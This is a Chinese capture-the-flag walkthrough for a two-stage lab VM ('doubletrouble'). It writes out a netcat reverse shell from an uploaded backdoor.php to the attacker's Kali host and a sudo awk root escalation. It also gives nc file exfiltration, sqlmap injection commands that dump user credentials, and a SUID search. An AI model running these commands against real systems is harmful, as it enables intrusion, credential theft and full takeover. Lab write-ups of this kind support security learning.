获取shell权限:
通过命令执行漏洞反弹shell,命令:http://192.168.4.195//uploads/users/542451-backdoor.php?cmd=nc -e /bin/bash 192.168.4.114 6688,kali端开启对6688端口的监听:nc -lvvp 6688,成功获得shell权限,然后通过:python3 -c 'import pty;pty.spawn("/bin/bash")'升级下shell 。

文章插图
提权:
查看下当前账户是否存在可以使用的特权命令,sudo -l,显示存在一个awk命令 。

文章插图
查询下awk命令的提权方式进行提权,命令:sudo awk 'BEGIN {system("/bin/sh")}',提权成功 。

文章插图

文章插图
去root目录下寻找flag未找到,但是发现了一个虚拟机:doubletrouble.ova 。

文章插图
第二个靶场下载:
这里使用nc进行文件的传输,靶机中:nc 192.168.4.114 8899 < doubletrouble.ova,kali中:nc -lvvp 8899 > doubletrouble.ova 。

文章插图
第二个靶场的信息收集:
本地使用vbox打开之后使用nmap扫描下地址和服务和扫描第一个靶机一样,发现主机ip:192.168.4.106,该主机同样开放了22和80端口、ssh和web服务 。

文章插图

文章插图
访问下web服务发现是一个登录窗口,目录扫描也未发现有用的目录文件 。

文章插图
SQL注入:
使用sqlmap测试下注入,看是否存在注入漏洞,命令:sqlmap -u "http://192.168.4.106/index.php" -forms,发现存在时间注入 。

文章插图
然后进行数据库的爆破,命令:sqlmap -u "http://192.168.4.106/index.php" -forms -dbs,成功获取到数据库:doubletrouble和information_schema 。

文章插图
然后进行数据库表名的爆破,命令:sqlmap -u "http://192.168.4.106/index.php" -forms -D doubletrouble --tables,成功获得表:users 。

文章插图
然后进行表信息的爆破,命令:sqlmap -u "http://192.168.4.106/index.php" -forms -D doubletrouble -T users --dump,成功获得两组账户名和密码:montreux/GfsZxc1、clapton/ZubZub99 。

文章插图
获取shell:
通过xshell使用账户名和密码进行尝试连接,发现clapton/ZubZub99连接成功获得shell权限 。

文章插图
在当前账户下发现user.txt文件,获取到第一个flag信息 。

文章插图
提权:
查看下当前账户是否存在可以使用的特权命令,sudo -l,显示不存在 。

文章插图
查看下具有root权限的文件,命令:find / -perm -4000 -type f 2>/dev/null,发现存在一个/usr/lib/eject/dmcrypt-get-device,在https://www.exploit-db.com/网站查询可以可以利用的漏洞,发现存在本地提权漏洞,但是经过尝试均失败 。
经验总结扩展阅读
- 奥比岛:梦想国度新版本暗影之谜有什么内容
- 无期迷途浊暗之阱怎么玩
- 我是特种兵之利刃出鞘劫法场是哪一集?
- 陕西猕猴桃之乡是哪个县
- 云原生之旅 - 10)手把手教你安装 Jenkins on Kubernetes
- 猕猴桃怎么才算坏了
- 明日之后深海版本转职卡怎么获得
- 剔骨之刑是剔哪里
- 韩国为什么比朝鲜发达
- Java安全之动态加载字节码